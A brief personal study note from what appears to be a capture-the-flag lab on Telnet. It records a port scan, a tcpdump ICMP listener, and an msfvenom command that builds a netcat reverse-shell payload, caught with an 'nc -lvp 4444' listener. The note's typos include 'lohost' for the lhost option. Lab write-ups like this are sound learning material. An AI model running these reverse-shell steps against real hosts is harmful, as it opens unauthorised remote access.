Network Services part 4

Enumerating Telnet

Same process as with SMB, start with a port scan.

Answered the questions

Exploiting Telnet

Since I always forget,
CVE - Common Vulnerabilities and Exposures

Even though CVEs exist for telnet, still far more likely to find a misconfiguration to exploit.

The Next Task

Try connecting to system scanned in previous task.

Need to use a listener, can use tcpdump with sudo tcpdump ip proto \\icmp -i eth0 to start a tcpdump listner listening for icmp traffic. Only use eth0 for Atackbox, use tun0 for vpn connection. Initiate a ping on remote session using .RUN ping [ip address] -c 1 where ip address is the local machine to see if can send commands to remote session, and if connected all the way back.

Create a reverse shell with msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R where:

  • -p = payload (cmd/unix/reverse_netcat)
  • lohost = local ip address
  • lport = local port to listen on
  • R = export payload in raw format

Start netcat listener with nc -lvp 4444. Once connected, can run commands through listener.

Answered all questions and got the flag.